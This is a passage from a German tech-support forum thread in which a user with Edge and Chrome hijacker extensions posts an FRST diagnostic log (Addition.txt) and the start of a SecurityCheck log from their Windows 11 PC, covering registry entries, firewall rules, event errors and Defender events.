ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers-x32: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers-x32: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers1: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers2: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers2: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers3: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
ContextMenuHandlers3: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\nvshext.dll [2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers6: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
ContextMenuHandlers6: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
ShortcutWithArgument: C:\Users\skysc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\188f5ec9d11ded56\Persönlich 2 - Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --profile-directory="Profile 1"
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\regfile: <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.reg: => <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.bat: => <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.cmd: => <==== ACHTUNG
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\.DEFAULT\...\adaware.com -> hxxp://adaware.com
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\localhost -> localhost
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2022-05-07 07:24 - 2024-07-23 15:17 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\skysc\AppData\Local\Microsoft\Windows\Themes\green\DesktopBackground\design ohne titel.jpg
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
ist aktiviert.
Network Binding:
=============
Ethernet: Realtek PCIe GbE Family Controller -> rt68cx21x64.sys
netvsc_vfpp: Microsoft NetVsc Failover VF Protocol
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
HKLM\...\StartupApproved\Run: => "RtkAudUService"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\StartupFolder: => "SearchEngineOptimizer.lnk"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Stable"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Browser Assistant"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "SUPERAntiSpyware"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Lunar Client"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{E8534983-99FC-4813-8A32-4BDF79D77A10}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{DC40325A-F8C9-4E26-BB00-752EF503041E}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{7474212F-5321-4112-A0EA-F6B43DBB7CC2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{DD47FF0F-4E4B-4A54-97BE-40F30D10A97A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{8EEA38C7-2FF3-4EAD-A0DB-52633701FD43}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe
FirewallRules: [UDP Query User{07AD8478-7D92-4DBD-B22F-B61CE4ACEB13}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe
FirewallRules: [{A447F68E-3F14-4304-B618-752761625611}] => (Allow) C:\Program Files (x86)\Overwolf\0.256.0.2\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD)
FirewallRules: [{418282C4-3526-40BD-8F8D-7DFE215E55B1}] => (Allow) C:\Program Files (x86)\Overwolf\0.256.0.2\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD)
FirewallRules: [{8DB183CB-14DD-457A-8A2C-7DDE4ABCE532}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{347C93E5-760A-4741-A101-596711870073}] => (Allow) LPort=32683
FirewallRules: [{EFCE4288-3DBD-4C1A-8BEF-5A9FD557170D}] => (Allow) LPort=26822
FirewallRules: [{7606C23E-29AB-48B7-9525-CD1FF1876A84}] => (Allow) C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe (Brave Software, Inc. -> Brave Software, Inc.)
==================== Wiederherstellungspunkte =========================
17-07-2024 19:25:24 ScanGuard-Installation
18-07-2024 16:44:58 Revo Uninstaller's restore point - SpyHunter 5
18-07-2024 16:46:51 Revo Uninstaller's restore point - AVG AntiVirus Free
20-07-2024 14:38:51 Revo Uninstaller's restore point - ScanGuard
21-07-2024 13:51:58 Revo Uninstaller's restore point - ReMouse Standard
22-07-2024 23:26:21 Revo Uninstaller's restore point - SUPERAntiSpyware
==================== Fehlerhafte Geräte im Gerätemanager ============
Name: GENERAL WEBCAM
Description: USB-Videogerät
Class Guid: {ca3e7ab9-b4c3-4ae6-8251-579ef933890f}
Manufacturer: Microsoft
Service: usbvideo
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (07/24/2024 09:54:57 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: SKYSGAMINGPC-CA)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
Error: (07/24/2024 09:54:47 PM) (Source: Application Error) (EventID: 1000) (User: SKYSGAMINGPC-CA)
Description: Name der fehlerhaften Anwendung: MSI_GamebarTool.exe, Version: 2.0.0.11, Zeitstempel: 0xd36e1d1f
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.22621.3880, Zeitstempel: 0xdb9989e8
Ausnahmecode: 0xe0434352
Fehleroffset: 0x000000000005fabc
ID des fehlerhaften Prozesses: 0x0xf40
Startzeit der fehlerhaften Anwendung: 0x0x1dade0350832a1c
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe
Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll
Berichtskennung: ce9e05b7-8a5a-4ac8-99a0-ecd1526e0cbd
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (07/24/2024 09:54:46 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: MSI_GamebarTool.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.IO.FileNotFoundException
bei WpfApp10.App.Application_Startup(System.Object, System.Windows.StartupEventArgs)
bei System.Windows.Application.OnStartup(System.Windows.StartupEventArgs)
bei System.Windows.Application.<.ctor>b__1_0(System.Object)
bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
bei System.Windows.Threading.DispatcherOperation.InvokeImpl()
bei MS.Internal.CulturePreservingExecutionContext.CallbackWrapper(System.Object)
bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
bei MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object)
bei System.Windows.Threading.DispatcherOperation.Invoke()
bei System.Windows.Threading.Dispatcher.ProcessQueue()
bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef)
bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object)
bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32)
bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate)
bei System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32)
bei MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr)
bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef)
bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame)
bei System.Windows.Application.RunDispatcher(System.Object)
bei System.Windows.Application.RunInternal(System.Windows.Window)
bei WpfApp10.App.Main()
Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname skysgamingpc-capi.local already in use; will try skysgamingpc-capi-2.local instead
Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 skysgamingpc-capi.local. Addr 192.168.2.111
Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.111:5353 16 skysgamingpc-capi.local. AAAA 2003:00D2:C707:2800:031B:89C5:A284:FD97
Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 skysgamingpc-capi.local. AAAA FE80:0000:0000:0000:B0A7:1013:755D:9641
Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 skysgamingpc-capi.local. Addr 192.168.2.111
Systemfehler:
=============
Error: (07/24/2024 09:56:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet:
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.
Error: (07/24/2024 09:56:40 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Google Update-Dienst (gupdate) erreicht.
Error: (07/24/2024 09:54:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 6 Mal passiert.
Error: (07/24/2024 09:54:43 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet:
Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt.
Error: (07/24/2024 09:54:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 5 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (07/24/2024 09:54:42 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet:
Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt.
Error: (07/24/2024 09:54:40 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 4 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (07/24/2024 09:54:40 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet:
Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt.
Windows Defender:
================
Date: 2024-07-24 15:41:07
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {FD7F2462-F47E-4902-9C9D-AB053D1F2685}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-07-22 17:28:46
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {7AC7B037-E956-44C8-9B4C-DB9240EE71AB}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-07-21 13:35:58
Description:
C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern.
Erkennungszeit: 2024-07-21T11:35:58.436Z
Benutzer: SKYSGAMINGPC-CA\skysc
Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente
Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe
Sicherheitsversion: 1.415.215.0
Modulversion: 1.1.24060.5
Produktversion: 4.18.24060.7
Date: 2024-07-20 15:26:46
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {B889A637-0393-4E52-937D-977966347CE0}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-07-20 14:46:03
Description:
C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern.
Erkennungszeit: 2024-07-20T12:46:03.035Z
Benutzer: SKYSGAMINGPC-CA\skysc
Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente
Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe
Sicherheitsversion: 1.415.174.0
Modulversion: 1.1.24060.5
Produktversion: 4.18.24060.7
Event[0]
Date: 2024-07-15 17:37:29
Description:
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.
Date: 2024-06-16 16:43:01
Description:
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Verhaltensüberwachung
Fehlercode: 0x80070002
Fehlerbeschreibung: Das System kann die angegebene Datei nicht finden.
Ursache: Der Filtertreiber benötigt eine aktuelles Modul. Sie müssen die neuesten Updates der Sicherheitsinformationen installieren, um Echtzeitschutz zu gewährleisten.
Date: 2024-06-15 22:05:17
Description:
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Netzwerkinspektionssystem
Fehlercode: 0x8007045b
Fehlerbeschreibung: Der Computer wird heruntergefahren.
Ursache: Dem System fehlen erforderliche Updates zum Ausführen des Netzwerkinspektionssystems. Installieren Sie die erforderlichen Updates, und starten Sie das Gerät neu.
Date: 2024-06-13 18:06:16
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren.
Security Intelligence versucht: Sicherung
Fehlercode: 0x80004004
Fehlerbeschreibung: Vorgang abgebrochen
Security Intelligence-Version: 1.413.76.0;1.413.76.0
Modulversion: 1.1.24050.5
Date: 2024-06-13 18:06:16
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren.
Security Intelligence versucht: Aktuell
Fehlercode: 0x80501102
Fehlerbeschreibung: Unerwartetes Problem. Installieren Sie bei Bedarf verfügbare Updates, und starten Sie das Programm dann erneut. Informationen zum Installieren von Updates finden Sie unter "Hilfe und Support".
Security Intelligence-Version: 1.413.266.0;1.413.266.0
Modulversion: 1.1.24050.5
CodeIntegrity:
===============
Date: 2024-07-24 22:01:12
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2024-07-24 21:58:42
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2024-07-24 21:57:12
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\SecurityHealthService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Norton Security\Engine\22.24.2.6\symamsi.dll that did not meet the Windows signing level requirements.
Date: 2024-07-24 21:56:41
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe) attempted to load \Device\HarddiskVolume3\Program Files\Norton Security\Engine\22.24.2.6\symamsi.dll that did not meet the Microsoft signing level requirements.
Date: 2024-07-24 21:56:40
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Norton Security\Engine\22.24.2.6\symamsi.dll that did not meet the Windows signing level requirements.
==================== Speicherinformationen ===========================
BIOS: American Megatrends International, LLC. A.B0 08/11/2022
Hauptplatine: Micro-Star International Co., Ltd. B550-A PRO (MS-7C56)
Prozessor: AMD Ryzen 7 5800X 8-Core Processor
Prozentuale Nutzung des RAM: 26%
Installierter physikalischer RAM: 32694.09 MB
Verfügbarer physikalischer RAM: 24136.53 MB
Summe virtueller Speicher: 43958.09 MB
Verfügbarer virtueller Speicher: 33923.95 MB
==================== Laufwerke ================================
Drive c: (Windows) (Fixed) (Total:1906.64 GB) (Free:44.97 GB) (Model: TEAM TM8FPD002T) NTFS
\\?\Volume{41e7a2f5-393b-493b-be00-74394b7a817d}\ (Recovery tools) (Fixed) (Total:0.98 GB) (Free:0.32 GB) NTFS
\\?\Volume{7b3d089e-4810-4004-aca0-af67060b3ad4}\ (SYSTEM) (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Size: 1907.7 GB) (Disk ID: BDAE7615)
Partition: GPT.
==================== Ende von Addition.txt =======================
|
|
24.07.2024, 21:12
| #8 |
| | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Hier noch der Securitycheck: Code:
ATTFilter SecurityCheck by glax24 & Severnyj v.1.4.0.57 [24.01.24] WebSite: www.safezone.cc DateLog: 24.07.2024 22:06:32 Path starting: C:\Users\skysc\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe Log directory: C:\SecurityCheck\ IsAdmin: True User: skysc VersionXML: 12.40is-24.07.2024 ___________________________________________________________________________ Windows 11(6.3.22631) (x64) Core Release: 23H2 Lang: German(0407) Installation date OS: 07.08.2023 12:09:18 LicenseStatus: Windows(R), Core edition The machine is permanently activated. LicenseStatus: Office 16, Office16O365HomePremR_Grace edition Windows is in Notification mode Boot Mode: Normal Default Browser: C:\Users\skysc\AppData\Local\Programs\Opera GX\Launcher.exe SystemDrive: C: FS: [NTFS] Capacity: [1906.6 Gb] Used: [1861.6 Gb] Free: [45 Gb] ------------------------------- [ Windows ] ------------------------------- User Account Control enabled (Level 3) Norton WSC Service (nsWscSvc) - The service is running Remoteregistrierung (RemoteRegistry) - The service has stopped SSDP-Suche (SSDPSRV) - The service is running Remotedesktopdienste (TermService) 